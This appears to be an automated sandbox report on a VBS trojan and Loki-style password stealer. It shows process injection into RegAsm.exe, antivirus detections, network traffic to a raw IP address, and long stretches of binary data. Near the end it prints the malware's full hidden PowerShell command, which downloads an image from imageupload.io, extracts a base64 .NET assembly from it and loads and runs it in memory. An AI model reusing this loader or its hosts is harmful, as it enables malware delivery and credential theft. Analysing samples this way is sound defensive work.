­÷H¢ùô½ÔÅú½ö•T4Ÿ]ã2«ñA óq£VW£Åߨiq¶ãEä¦bÀÕÁé^aSs‘/r€Y7uiµdJàÝÅÊl›½°8S~&jß.ý<³¤2˜Ö‡,&[ã6ϧRTÛR<a¥3 t¨6ÚS·]Ÿ^ÄÛÕy¼Çj–Õð/–Ÿ¥ÅTVÞs m%¶™Ð'q-¼­"½º d3<Üoí§ÄxïXJ…²PIóÑæ8·†4\Øunc³‰SAqdjÜ»¬x6wDÛ+R˜ÃuZN›~KêV 1BúeþÅïó(ð«÷Oî@r‘èt a\VX×½Qðk(%?š"÷º\כÄoĺj¤»ŸntŒøS`ï%gº“Y ZL›ììdÊmWZ¼í»ê¿¿`ĀY9ÉÊ PEßåþ…¹I«á_ì ¹€-wž§÷F9&W¨s >‡Ýä_ƒãìpb–%6y>èI½%¢ºÇq)©0՗§:UKjÓóÕ /ª`‡TÙDbЙ¬IpZTƒu‡"é¨ÿ§‚+¥úäñ šrî;Ed ¡Ÿö$I¤B|ӓ“[ž°
Data received —™£šÿõˆùT2#cPz¼w—ì÷ÐЦ‰Ä”…¤O ™¡¥¦úø‡«‘\^3 •±ϨK].áÖƯ¤Ë"“'ÚÇÄ¡ÆpÊT>Ï{¯+ÙNŠ ‘ý È­½=¾\xf½Ï²WÝ8§%8H[ OÛr×éDóW0íX|9±§è{ýäÁؾVû¿ÛÝ¡V1ÏûÊ=)c«ND£Å±xbÂ"’©g›±„ÒÊt÷0;þ$>y~M{ÈM‘6­¼i pûªÙ½Ö1%xÛ±fBU\¦»sÏü" SñÙ<GA¬™½ªCÒ+©ˆêàLWè6©î²El¨»®¥¢¹´ª(ïfôâ‘Æ°^»…¿é«,èMÑ«ºT ;,§ˆF;¢ÞGg݅…ûÜ啿Ñz¢–ÆÐ_7ÛG-¹ñ‹§'Qížï¦:Ó@%®,]ëVºÆ¾eîÀ¾òR¼«~ˆ€÷ó«:L% ÙÜÄúòa‘*b‰®7—'"Yܝò.RûÑ{;FN„[ÏÏSºÂ|s›Š€_´¦—ÿ@f |ŸÅ*"“^n XRjly@kW¾ûß[V„0]Ç3·½È‘ýEB€‰ÈèӂgPáBMiqŽÖ+Ɓ³øÀ =ûŠrƒþÒºiÑt¥˜1ÁII—^òÍ\Øîù<ªŠh÷Ùåµ-×Àê”*aÞU"D2‰EGzØԌž{?ŒTkõ o¥LÁݤé"ä<e}'p›oB‹Í}êFÌe¹§u~žá[s‹¹ƒ€(ÛÌblÍ[+Í?à@vo'¸±•`):c3êpŸyD¿K…N È® < ’ÎÓl5ïU†¶´n~ÿK·šÊØ.‘CÌ‚+­æ,§i®Êùp*ñ”– ª˜'_3Ä£²ÕÊ:m.%­¯2WG¼ùmÚH{ØzÃøÄç¦o´Í‰"Ô/*ä zgW™á*¡Km¹×"ÓC£6"eâDܱÓÌ&1ƒ«ó€$bú—g I۔ă£K!!Ê楲­‹¡UïX"ƒ— <rÉFÔJLšw”“ú
Data received š;‘5̯á/§Tg±ò¾[t‹aï üëÜyxEÇ ufÜõOLXÕG'¤œêÂM:­á<ÏÚ#¶?áaÆþŽŠ§áuÔ»¥‹½»µpðX)aÎÐ.ŸCôÞ¾Éên×<tvXí´Ð/äï‰aÐï ¥Ã"Á«pÝÀÑ£=P¾œª(Z ŸÇíºß2‰×æõKõ%÷»Õ¼Q=ÑÉ`í{%G`]“ÜÐÓZõ¿Ía%‹ètFÒDzn‡wÒ$Áȟ¦É#ƒ®Å)š3Çή£a…ì{Ï;íÃPÇäY¡¥¦&âs홰ç‰!; 5dâKFt.AèlåíÿnÈÞ›5½üœî;V ,ž†àó Ì"Ñ·÷] fÚïΧÇ^cÏóÃA%ÿKuÏw£»Ë|öoj…LÙ^Ë*®7T’ÁS†êøDÛÀ†-„¸.é/騬x$÷䇏ÏÀ¸E›ÉÒhÀÇ6.]Úìؼ^å<ߐîŒÉÉà*ë0Y)ÃæSD˜2‡«¸Rvfj‘CyEÈw*•›÷ïjMûX8YÏíÚ äøvâT!1<ÌÌSà\ÝÃ(òhàÄ© 5ÖuÂ(ElXä7E` ä¼DÖ>ÝayÛæùXc/¦™Kf‘Hçë6¦k[È£š©K‰ôÝ ÃÐå×ÈÌ €L¿Ž‰h­±¸4@šVf„@ñòçáŠw ]…´¶Þœ‚‰¶{K•:§oÖîåÉ¡‚ÿl
Data received S+« wèÏlGàëÜöj0ÌË|ؖ£¥$†Â¬úæOUr¯vêM±äPäü®h&ª¦Äsž ˆ†Ï—@¡ùÞx(ÂßÀzÆPòÀç ²äøÔt%%O˜ ©«¼{åi%ÿ›‰qä­L€pÃÜÚ;µ\åtäÃË¿p%¦*ÇÀ@YŠí9X(Ô“W&®K ¼µ ¥öÃuò_“m±àk ^ ”Lã¿Uú[ä¬"¢¯)U£ãfö²~ˆÔðØ‚r½˜Ÿh‡~\iMþèŒu^„!ÂGžØ›w š·¼‡ÌU´„;NPæ՜·0í-ˆv†ZÃôE~|'Õ &õäjm²$j'"þ¡ê|÷‰‰efSÈF4…¨<_5i‚t¸$¨Z zÁÂ`AÅ'›Œå ȍVÇ°sÒVd˦ôI ™ÓÉ ®<ÀWV·Þl¬ï Û"×ÙteÀ›n1fUu˾ö%YØB´¤íÔ;¸=‰Ä“–á0}Ñ …¿øª›£D؃ß,ˆ )kèsïM’ ©:RŦëíE @=QÞ"ü§€â…òøͬÏM}žÒ¦™Ð5J4wø òe¾LƒÈ s<^*Rd¢Üx`ÙbÊ3,ù“¥/Ûùôˆ¨÷ÃYȘ“b·¢¨ïÄWÃHDƒêùÉ jtõ18ÛóvÇ'¤9¡Iù`îªOu©ífÚ}'€q ”gDê¦Hf}¢Š³ß{´äJì>²+4^‰½+•ýˆaJ†F2V›Ý@6Ä±¦Þ ¦ÄOʯ˜’ž|NܺáŠ50#§C&£uE~I°1$Ÿ_Քp¸µ×ÚÒ½ë'là†ùñö³'ÔCĤ6RÁP#¯9‡ÉÈûÄKjíp‡]½­F£†ëù;¯³ä¿EõFHD(Z3y@L¤."ܞKLÅâE?¸NìSü.ûŽàS6ô"õqùè d%(µÑ&è>¸S—ž-j¦‡ÀüœÄ*Ïg͉|Þ¾ùªC brë½Ç<’Ï.“¾«i+x®Tv¬ 0]îÞµ r6µ4ØR(KÑ?8p!ÅmÙ¾©« 5u&{²öw©ý©gI Ò·÷ÆrœûXyÛ°»Ö‘Ga›±0a“HĜ~¥û@MÛ"`=׍^)IðR&N`¸w*4á E:H·b"°ž.ƒ¶ÉÚœòµö·+Ó7)˜L¤šuød[>ì%aê}¬×Ëö¦ ñA±3ÃnBÖE±²ëT¸c·¦†â+)’Œ›Z£§å “ˆ$!ÂÑ¢]s÷¸€Ë|ðÙ¢úŸ(¹Z*6ó66ꟅÅc¹„T=ç'oZ’I·;fڲ̖äe®Ä[‡³tP›ñ(qp›Gü£9\^²\Á÷¾·+(\;Æ`“î‡o»NÅLµª\¼j±%šŸ¹O$fõ —eb#q¯`Ât)þ¡@Œg…8_I*uZöiÒY¼ôÉ6ô-á3C´YR`]úݘgÙ".=¶r¼Á¦ <>tnúCäq4“È¡†§W+1%Þm„“ÔçÉ9Νån»35k–7õé{ñCkî}¾ð•bþO­õ—ü¶4ôâ*={@sæf‚`T\Up0ŒDáÒ®3êË H|¢äïiädBlƒ02]M—@¾“äËÜ4‚¦¯¨’Üšl¼_Çè;E™C¥«£”ÀÚÐ £1VŒˆó'îÿǃ\ayDP…à…F!~§ Rq ùÙ¢>[u’êsUt;}´.ç;?(ÑIbÓVØ{šq…‘ð%”K’¥¼*RaÂ’Ÿ÷ÊrTÝ›AgF·NÆ
Data received ¨ÛT„Öµ‡ Žø™8û°ÆضëŦ-›xVV÷؋œà"²"ÞÄhcJ^­{³:…ánïÂs$¡#Û…p?© çÔª¢ƒÕmÞª¿c÷‚CÄ[cÕöH#⮊þ¸­È®j©"º®¬Æé þB¬gPBy`îe¶l(ÿ¼JTï‡nÒFÖxmQÜ æ?ðtwLo“Ú$ QjFpÖz!,ÖÀC•…è¥; æµôà jŠæ© ÚGW4 šRÍ阁uãëÃзw+/\B3(ÿXhÊqëðm½ïoãžå·à{Ö`>i,(ŸJ慲yi%úÃÚ`ÈÔóD#ލàðBµÐT£þÎÿӝ|?cd ´¦î_í6:ÌR™Ù4縌ˆäjÄ°#<N×\6›¨Ü£±:r­C‘©g9ÊÝg¤ä0Â-žÝ >³Ã¢K•1ÄówïeÓz3õÄàƒÝX5÷„rNÃ7M^vã4È皥zŽà’Í£;m0¿·ÉúhO½iRyjêYTsÅñFô©mÒ/æ<Ó°CÿÃiáDVï”ÊÃÚ@å¥îW9æ½V1[¢×¹Ý6}Ve9•,Ñ^—µ0 œ/Mp\"=AhžàÑÞê\5ÓØûòS%\Y …U½ºìz ]Gzÿó,ö­½……»¼Ê §žâ½›¦saò¨Ð~ùth¸#²(M!cÄÛOóèp Zy*ïS)þÖ´p^$X¯»ÿ.©{À¤¶]q@¼Þê³FFRsy™F)+eùW¶›†Ùh!ÃÖ¨õïÈMNy%×ZÔïw!¬p1-ˌԣoyA÷)¥?>sœòy€ö3Úqñ·Æׂt©\`ÝL&GôÅ̞€é‘½\+ظl&ö?Ðá§`-5™iòÏ.¼ÅÍ.F¯/ÌOÀߚ+šàgmÞj¬8 wJâ80ßÊ eޖ´¸é'ˆ¬iKKl궏T§jDr•£zîÞ>+É)¡4\õN °ÏMGew~k'°Kˆ&r.ÛR–ŸP6•ŠŠë¤Aªvðƒ‹/e)&BÈñl´†ò×Gzrm­wM€N\l<£·miÝFñYÀ?ÔM¯”ºm†Zák+ÇXW÷Û$·œUqx(6~’\Âàå: ˜Ö@Ÿ>à‚ íÙj/ß(l-UP@I øî­¨
Data received MÙhÝȁ“ã\Þ®ˆ¦·NˆØ€­ù$¦ÐÃM]=³7¿ß7Ù7—Wo©C㠏e’®ªYÝT+Ó˜½:÷yâ4FN¨AR§4ÙC;@HИ™ëÙ.ÔùtæV\Z‰pbš¸Ä/œIzÎ2H–ʳÃE_¼iÓ\,Wþ1n5hVêÐ|0Œ·^ì›ëù4o5³×/pÏôÍd!+zoz Q$†Ì ÇþsM®ˆ›@ԑôØSD] ÇÓ£ò¸y6ħ}´^ñ&S(•røK\qí¿ÁL9ºt§³„!vP.*£–‘}Öý™`Ö]Ñ”ìs –"î×I™H3+r9 Õ¹¡ô…Yœ}Ç÷B$,½&£›‚J:™8Óïð>µ- —R[½›>ßræëžDԔœÙyFFpEÏjË™Ào؉ Ü:q?ñ#BM+¹§ ¼ÀŒÏ’–·V€û>Ò-m…ãù‚Ü .ÑxJd½DäA}?oûÃ1E±ÎΪè¸ÍÆ<<º[$›e§BM±kÒËŒçÊÃ(ÏͼÒסˆMí,ÎD¾¹
Data received n’ŠøIÓ¨?{ºàO\è>£ëìŸäÒÞå&OÄ×È-ːÔb/Šê­kfvPŽÃÃۆ´ÊfêËô¨ÿ®±HQèSR‰_¾Ê Œ@¡Å)Vè ä@j«~2–©„Ù9…y¦P˜ÆèÚ¡ùôD¢?ôÄÝ0÷…‰7OïYhßÊ@ͤ ?¤8kÔ6ˆh™–”3œ€˜úš¼O×(©¦÷5:ßñ%¦«*SBs=ÔòåúÇ&ªÒN X¸P $yºR>¦ª ãþû†…t“‘zÝ x÷Nå:æ}P— ±²ÁsV?*¤`¸ÌÅ^]HAØ 4¨5ú¬  ,ÔR6…Á…0Ÿ@½‚6‹TGf»#n®zÌ͂‡KP6nç‡r9Ûúæ¦((Žã3€¡o‰®kø.b’2,Ò:؟ß4Í¢ï¼g>ö†(4ôa˜|]㜛Ó•øe׃¤ž*1™ÐÏSII‰œë†÷ӌÂÇ/©ýGÃeÜÂÖÅ:Kî77Š=®-X3s …¦{<Äݖ³ã†”2FKlõa×ÄýÁTr†,Åȯ[>‚û³É“ŸRºw­½`ûC¶u[óÇ#_!mb:CÒÙ",ê¦hqQÉ.¦"⾦™þʌϹ,óÏîÑÑj ’Ê-õI¢=¨¾JèBy/²à™(yµž,£AVm•é]C8óK©oœ‡ NQ!ܳC\,VŸ²§—û˶Wº}¶T;Àƒx)“tCa&¬ꊅFa=o¥ôÂÈ'ዓ/|ãÚa¸Óä9O»í@u£ðîeYg!ÍÀ–«“4žavIUº$¢8.'#¨ZÒ¡s2™ËðlË-LˆQeiœ™½Üò¯|VðÜÓÜyOßEpGΓÐ⯔Ó<(ðÅcõ@BWôi¹g¸Ýš]MåºýÊ®´é{ÍÍØTÛ2Òõ„D³dyÀdšç?Y}‘qåï8ÜþsI£*Kwr}žO‰*!ó3ü܊ ò,å¯:ŸÆ.¯†ˆDøkcɵê]öí9tÕÔú¶¼: X\mDïƝFnM?口ŽŸô¸åã7»^t+^*»Å£%˜}õᵸŸÛ¨°nƒÍWÞ¢ai;ö륗ú+U½$QKN1¾ü³9ö.µ۝â}¤«u[µÆß³Ê1¿´±¾ZÑNZzæÂßzÈ~#’”Ñn¨7§Ž¿B¡†Ž)-ÉŽS['…j¼QëÕ º•7ëw™-ë.R'Ô%Ë@Pqey‡zÂH…Øö{ô„ïþŽÓ³Rw¯ô"§>lÔVIUš7«Ïv{¹
Data received ÆØF©•{@ºá1³•Ôt°.]õÒ÷[jl×^eޒüÁ涄‚_ÆI¯ T§m’°*äEÖY%r'ºÀ Éã?ՆeY"…$nB݉˜ô²–¦n÷ž¯BpRDC=®¼1ƒ´“ …}ñ¦Î¢ž˜ÈÌÜs¿,UYùÇÑ®ÐXù_ ¡á7½a^ÜÓ.ÒXàJ˜ú||ÍÆiÒ9gQ^™ "Jî{oâsya˜à{Á³\®ASeæoïY$ÂϦ܌#¸k–mY WÿÞ'•"/…ßÌõÖÒg(ž »yœWùn3ÚÝ´ém.“ïñ²çRó0s[=ËAHf"i4;à —çÊdWêKî“å¯ Ï¡NÂÏ8•ÇÇþìG¾²FrÞ9s°Fï¼J3úÔÁSjè‡!èS;¢Îaà»®æçÏù‡Êžç•™¸_×6b$Š)ú«e&"ªå9‚ØÞ؆(ÅI֥ڝ¥¼¾‹lÐp
Data received À
Data received †f R`ò¶N8c‰æî´Ô¬ÎÉäж ¬£)ï9Ÿ»$«!øY NÊw,cåÏ(›ýjççD wÈÜܦA¥Á‰dW%‹Ý®D‰o«½•À_sÄÇÕ"«ÇlZf´ó³¬ÐVOËdr´,œۡ n+/F»\á6B<÷*Æv}©ý [ëù¸¦ÑJÌšB‚Ù–8z[’.ÿDBYTüÚØα/« «lǺ³äðîkу\ŠUªFÈfÙ^ÿ?ñÍ֔¦ ñ3@œåzð~þõ°-é€Î#ñbŽâÉótï`ÖãâéüDQfØ"ÖOOjé;1žÂéàÖFŒ —\bÒ—Û>TQä‘OÿÂIè=Ÿ£Ë`øà}«uT÷™E©† MøÉxq_)Ô¾,«iŸž©ò”y0ÎÕøœè0²É“ÚÎVHM> T² fi2qýc”û¸•~³52$Tðªœ,#D„6œ,…fŸiE-AÎI¤—–³ xM÷‘ŸYX'Ÿò½ÿð7•pfÂ1þ™IªYï`#:wµ®Æ­Á·iFsÉßñ, P:‘#\
Data received ܆…2/ÒX–%GZ_ëä†k›‡ÄÇÊQ@ôó^™°òLÞížR¾'Û¾ÅvïÕu¯Æ)쬨]¯ä´>k-ÎÑ?›*[{cH··‹ù-˜TTÔ¹Ýx"Þêž@£¾èd‘±Þ1ëØõço«ýOz`#Kúp„­æZêøIˆÎôυ€GÎH«^ND“•ò.å`hµµúrVA(:|˜N­ø£ºÁòy¦}« þ#¢±¸£'á9¯†tàwåŒî™A`q ÷^qì-灉*1ŒÊ¿‰j;Ix–;1gÃô©‰Ë,Ø)ðš…zu²ƒxÇé×g~“‡þÏH….ɈWyŠ¥§³ _Õ׉•¨åÉí›*Á˜Úd…w6Äst Á>Ý2<:µؾhíz“ĆÞQCãjq‹é• #FÙÇ«2—»—¯J,\ÙÃAí$ø;óT¡Ò¬`&¾è ÈHêï¯Í XžÎ"LĜa4ø ʕ³B·½¡ï-u€5æ e*6ôü‚ë.Qsg‚O\™­îùÄzŠÌà|‘ww-̞Œ®Hë;¬ Ī÷`’¢IäuŠÎ0§ÿ=§Ñ3nêO¯¿ièߘDEå¿9Ϥ RŸ §£Þünï&CÈé:¯‚YÉhߢ6gçþŠÝ'ªly·*.sõƒëÒê„ÜþŒ…ÅÃÖâ~Åôt«6‘Soû§EHV’“ŽÖVìk·\¢ÙÚrà}U‘Š§º~hœÈÉ¢jàS߯ Žö°£ÐÜUbM‰ º5Y?³Ñ„`¥×©§œ2ˆ©ŽY÷S
Data received ñC³*B2:H]:cÄRq¹ÁÁ5"…&ýÀ_؅ånoòfRGà þêæO}5ù*î-Z8©„É)Á] Âxÿxqp‡v¢ÁÇ@0òÕi¥ÂÎnÿåi•ð€YpŒEÏê~ÏLøPݒš“ÛôSò.ø©…Ké)ï{M ™ÇÐR>½½e»­Ô]4“Å„Mé×à KÞxùð‚}¼Â=jv1*…£aL>ع¦¯ ±JCú:=f.¨µMØ¿>K/m-ŽK_Ñ:柶(¹UR;…:í˜Ž¦5¿ó“ï½iÊy–Y /ó¼è]§ÑZf#ÎAR¹lŸ¼cžÙWv嫘ºoT{”ª““Åps(AðycTû9¯†tH±} ɹ÷\RœH¿oùïünYË|+÷£”Re8.Û^ûbôÖîÒÕ x»îL*°RÈyö'úL¼\Ì25³GÿU- ;y:¡~7ú‹Ž S¢8/œŒ´c傹&íߙÜt^ô•BÜó¥¹zZÀãqn|uBÄ5X²aþšÅ6•øÎôKÇg•e‹´Nú;íŸ?kéêò×¹-ôe]t':ƒÌå €<ØÂKsÇð¡«S6ŒZGÈ*1ñ‚ ïïã×xä_ õZ‘©º;å¼íb”Pf{ ¦ÍŒ{v‹ÈgaP8uu€ÿ–(`·%6ïŒt¢úž÷ù7é‘9¯vY/WU™ÿ7tfo€u{DÙ+žãÒršäï‚èÅãôw¡ˆbZ/g{Ž Â<ëZëù„µ—„=ÙçAZÅŸÊŠºÓ¾\앫Xæ‘FFgêØìB óõè¬tÕß4«ÊÖ¸³_"/K;+å«0@@³Ñ‰cNÍ\û'©&ÐWc+Ìã]¶ÛTGKââ8ði÷£Bóîå](S0¿ì«âð‹2ÿŸ•“{쐒—Òǃ:ö¨ßØ*„Š©ØäzËêq ›¨kþ“¢®µŸx‘X¸=ý3cþƒ€
Data received è©Ì›µªPØ&¤…¾¸÷é”ï¦ÓŬ©WÁ“>ל Å(•»o­(ýWéɨX¼#?Å Úúíe8Š. –]wc'&yÝÅ&ÒkG×ü‚–nIUÌE¡ÙN1ƒ¦E®ßמf{Ã(F•&ÎJUtv,XÙ¦²üžÏVe²;’ ˓ö ŽˆÚ ÔÝ·Üþ‘z_™ˆõ¢€·A4?Ó5p[þÚïCÞ*…‡›EçÄ-r@” >*ybS0¸ Wñ7´ÜŠºV)ôýTCEƒä§æQ*<\]®)"VnґKú˕hüÊb&—à.hÛí¨DP?ƒ:Û%±È?—kbÆq¬EŒl®N’‹drÏi Eá™xó¬;1ñýp•r+½3×Ý¿(z­zß8{¯9|ÐCUüFɋ¼¤êx£´·Gº¥#÷] ©œ‘œ!/ø}ÚCIÿ >8[鞁|78‘As"‘sw³,ڌx4$fþÛjZÞ´E(M.Ni`œŠÉP]ÈMœÂÖ³\äØ¹Ûoî~c>£‚<\ÏtÔ·èµì¥ØA۝gù­þPÖñzÒdiÂ)¦²xóúÅ~ӞɓêðÅ,@$ÂY›»ƒLTÁÞ¢d" ÒÓ þ}íꙚïç,¯y¸„à-’?Ÿ«.@‰»­§UK*̱hT JI3Æ  õy7oUŠ††­O­cg-¹ꈞÊÜ¡óe¦jl˞Ǖn»aò‰æ<ÄΧÌg(—ÆFU)nªÎ%·$<QK¯qŒÊ7Í×l$PªÍý,dFÌ ªª‰Ž’ñv‡UoGšÌfVûsöÄÙ'ý“›¦Öë„eba·‡ö=OÁzºÌȏÙüä¶ìSVö‡G¦`¨ÝDBÝÙ(@@1ÈG‹ªQÃå¼Ì¡Mná&ó±2Œ5XwïI>=hyS¤*¢^^ùì5;Evˆ]Kq‘ֹ¤ËvÉZ¯ÛZPû”DÕX‘&Úr>þE¦UŽò¬ ¾¿Íkv©ZQ”$Üfå:hæ4,-‘¹ ûìì²IHÖOFÛæê%›ë$¶9‡È‰·i¿n¬SEz¢.+g¢LÇ×ÿ°UÚñc}a“²B(¯Ï‹÷+=JïbE8B¢ÒãW8¡Y}Õfxè|õ·LÚÞ~Cj°¸Uj„õÀþžSH £”^Ë4`,wúïk(yðŸ6~`dhä‘x©;UNBJ=Mï܏ÅPuŽS|m ´j÷ugÝÁ¥y}Fi®;#_š ü¤-Sš —Sk¶Á>D3Ûãm°ã0Òc5pð‡áðE}¤nÊ»{j4–x‰ZÆdáØ!ñ£¿÷.‘›˜p KKKP–ÙøÈøPK´Òiðû¿qÿ˜¼ÝI w̚! þ[:²Mb´Çº‰X†©‡ÏhPÐÞ)ÉëOÇ£Gý†èêœýUI̝w“õ¥h¦æc"Ôo^½qñÖ~œ"¯‹iFï :6ŠßxC ~)„°wc‰¢@+$ä3&R󝡷?£ám¥¬Š’ï©;Î_ÔÄI-ù+™~ئÓŒ r¶ 2ZþÇ´ZT²d<MWÎĸyC׋Â45™¶ =üÊ­•Õ„ê/’äç(þ‘+Õ¡Q쉕„x¿QñÄðëPÚ³ÉóU꒔§ ædŠ{cBø¦1&ÛTí¾ò6­òÏòþÈn'Ò«„Ý,;Ï|fÿÕh ¾ö ËK©ˆbS ú‘R™wÎߎäψ·Ð6¢%¸ÞEq©˜»B4¾c߃L؟ãwô¯ ¢eãÖá 3;wْ)»Á+Í{«vvó•0
Data sent qmeBû <j¶*Œ•¨c¸z˜Ïz›&B8fÉë9њX±/5 ÀÀÀ À 28,ÿimageupload.io  
Data sent FBAK- Öþ.ïä-ò(“îÊ-fb’½‚Ïä8‡ji· Çr_ÖDºÓIv¼Kák=>¢Ù­Õ A]ˆ’„/½0%oFlÐ'¦>¥ß™àåÓi>À’‡? Ä¤Pëí¤\VÄÁ“ÿ+ŽN‹ó¹ 
Data sent €HHif>•C‘…g5£ßuÕr%õøÿ՛ܓA„vSî°Ä¨SDR.wpæ‹ ò#V™ÁÒøÏ£‚Q&RZ&1®´CØFìäȁj™ä"hž/.¿&ޞ*~$ݎ4wУƬÿyu (3BFkç¹Ï×–¨
Data sent GET /file/PuttyLinks.txt HTTP/1.1 Host: 107.175.113.212 Connection: Keep-Alive
Time & API Arguments Status Return Repeated

LookupPrivilegeValueW

system_name:
privilege_name: SeDebugPrivilege
1 1 0

LookupPrivilegeValueW

system_name:
privilege_name: SeDebugPrivilege
1 1 0
url https://www.chiark.greenend.org.uk/
description Communications over RAW Socket rule Network_TCP_Socket
description Take ScreenShot rule ScreenShot
description PWS Memory rule Generic_PWS_Memory_Zero
description Communications use DNS rule Network_DNS
description (no description) rule DebuggerCheck__GlobalFlags
description (no description) rule DebuggerCheck__QueryInfo
description (no description) rule DebuggerHiding__Thread
description (no description) rule DebuggerHiding__Active
description (no description) rule ThreadControl__Context
description (no description) rule SEH__vectored
description Checks if being debugged rule anti_dbg
description Bypass DEP rule disable_dep
description Win32 PWS Loki rule Win32_PWS_Loki_m_Zero
host 107.175.113.212
Time & API Arguments Status Return Repeated

NtAllocateVirtualMemory

process_identifier: 2680
region_size: 1499136
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00400000
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
process_handle: 0x00000384
1 0 0
registry HKEY_CURRENT_USER\Software\SimonTatham\PuTTY\Sessions
Time & API Arguments Status Return Repeated

WriteProcessMemory

buffer: MZx@xº´ Í!¸LÍ!This program cannot be run in DOS mode.$PEL³­édà Z ê &è @à#@hд€@«J W0¤ ˜Ó  • ÀlÖP.textŠX Z  `.rdata‹p Œ^ @@.dataØ@ ê@À.00cfgPö@@.tls `ø@À.voltbl’pú.rsrc@«€¬ü@@.reloc¤ 0¢¨@B
base_address: 0x00400000
process_identifier: 2680
process_handle: 0x00000384
1 1 0

WriteProcessMemory

buffer: dpLæLÿÿÿÿÿÿÿÿÿÿÿÿNl±¿DNæ@»u˜DPDPÀàDÿÿÿÿàKMtˆM,‹MĈM|‹M‰M̋MX‰MŒMœ‰MTŒMà‰M˜ŒM$ŠM܌M¬ŠMdMhŠM MD…M äOØP ÙOäP ½OðPÈOüP «OP¶OP¤O P ÏOÿÿÿÿ<±M ÿÿÿÿÿÿÿÿÿÿÿÿ€  abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ¤`‚y‚!¦ß¡¥Ÿàü@~€ü¨Á£Ú£ þ@þµÁ£Ú£ þAþ¶Ï¢ä¢å¢è¢[þ@~¡þQQÚ^Ú _ÚjÚ2ÓØÞàù1~þ8¬MPPPPPPP¸®M8°M©MÐP°PC   8¬M:±M¤P´?P´?P´?P´?P´?P´?P´?P´?P´?P¨P¸?P¸?P¸?P¸?P¸?P¸?P¸?PPP..þÿÿÿ “PSTPDTPSTPDTÈ P PH PÈ Pÿÿÿÿÿÿÿÿþÿÿÿè¤M.?AVbad_exception@std@@è¤M.?AVexception@std@@è¤M.?AVtype_info@@
base_address: 0x00500000
process_identifier: 2680
process_handle: 0x00000384
1 1 0

WriteProcessMemory

buffer: VëI
base_address: 0x00505000
process_identifier: 2680
process_handle: 0x00000384
1 1 0

WriteProcessMemory

buffer:
base_address: 0x00506000
process_identifier: 2680
process_handle: 0x00000384
1 1 0

WriteProcessMemory

buffer:   ^[^è£ÛÞ!&079< #7:RT <?@Cwy¯² \^…‡™›ËÍIK´á!$  ), %);>MPqtÆÉ8;FI "14;>UX§ª=@WZ©¬69 "'
base_address: 0x00507000
process_identifier: 2680
process_handle: 0x00000384
1 1 0

WriteProcessMemory

buffer: @
base_address: 0x7efde008
process_identifier: 2680
process_handle: 0x00000384
1 1 0
Time & API Arguments Status Return Repeated

WriteProcessMemory

buffer: MZx@xº´ Í!¸LÍ!This program cannot be run in DOS mode.$PEL³­édà Z ê &è @à#@hд€@«J W0¤ ˜Ó  • ÀlÖP.textŠX Z  `.rdata‹p Œ^ @@.dataØ@ ê@À.00cfgPö@@.tls `ø@À.voltbl’pú.rsrc@«€¬ü@@.reloc¤ 0¢¨@B
base_address: 0x00400000
process_identifier: 2680
process_handle: 0x00000384
1 1 0
MicroWorld-eScan VB:Trojan.Valyria.8583
FireEye VB:Trojan.Valyria.8583
VIPRE VB:Trojan.Valyria.8583
Symantec Scr.Malscript!gen11
ESET-NOD32 VBS/Kryptik.UA
Avast VBS:Obfuscated-KJ [Cryp]
Kaspersky HEUR:Trojan.Script.Generic
BitDefender VB:Trojan.Valyria.8583
Rising Downloader.Agent/VBS!1.EC5A (CLASSIC)
Emsisoft VB:Trojan.Valyria.8583 (B)
GData VB:Trojan.Valyria.8583
Google Detected
MAX malware (ai score=83)
Arcabit VB:Trojan.Valyria.D2187
ALYac VB:Trojan.Valyria.8583
Ikarus Trojan.VBS.Agent
AVG VBS:Obfuscated-KJ [Cryp]
registry HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\F81F111D0E5AB58D396F7BF525577FD30FDC95AA\Blob
Time & API Arguments Status Return Repeated

send

buffer: qmeBû <j¶*Œ•¨c¸z˜Ïz›&B8fÉë9њX±/5 ÀÀÀ À 28,ÿimageupload.io  
socket: 1444
sent: 118
1 118 0

send

buffer: FBAK- Öþ.ïä-ò(“îÊ-fb’½‚Ïä8‡ji· Çr_ÖDºÓIv¼Kák=>¢Ù­Õ A]ˆ’„/½0%oFlÐ'¦>¥ß™àåÓi>À’‡? Ä¤Pëí¤\VÄÁ“ÿ+ŽN‹ó¹ 
socket: 1444
sent: 134
1 134 0

send

buffer: €HHif>•C‘…g5£ßuÕr%õøÿ՛ܓA„vSî°Ä¨SDR.wpæ‹ ò#V™ÁÒøÏ£‚Q&RZ&1®´CØFìäȁj™ä"hž/.¿&ޞ*~$ݎ4wУƬÿyu (3BFkç¹Ï×–¨
socket: 1444
sent: 133
1 133 0

send

buffer: GET /file/PuttyLinks.txt HTTP/1.1 Host: 107.175.113.212 Connection: Keep-Alive
socket: 920
sent: 84
1 84 0
Process injection Process 2272 called NtSetContextThread to modify thread in remote process 2680
Time & API Arguments Status Return Repeated

NtSetContextThread

registers.eip: 0
registers.esp: 0
registers.edi: 0
registers.eax: 4843558
registers.ebp: 0
registers.edx: 0
registers.ebx: 2130567168
registers.esi: 0
registers.ecx: 0
thread_handle: 0x0000035c
process_identifier: 2680
1 0 0
parent_process powershell.exe martian_process C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
parent_process powershell.exe martian_process "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "$imageUrl = 'https://imageupload.io/ib/ws8MAJ6eptiLfGu_1697738492.jpg';$webClient = New-Object System.Net.WebClient;$imageBytes = $webClient.DownloadData($imageUrl);$imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes);$startFlag = '<<BASE64_START>>';$endFlag = '<<BASE64_END>>';$startIndex = $imageText.IndexOf($startFlag);$endIndex = $imageText.IndexOf($endFlag);$startIndex -ge 0 -and $endIndex -gt $startIndex;$startIndex += $startFlag.Length;$base64Length = $endIndex - $startIndex;$base64Command = $imageText.Substring($startIndex, $base64Length);$commandBytes = [System.Convert]::FromBase64String($base64Command);$loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes);$type = $loadedAssembly.GetType('Fiber.Home');$method = $type.GetMethod('VAI').Invoke($null, [object[]] 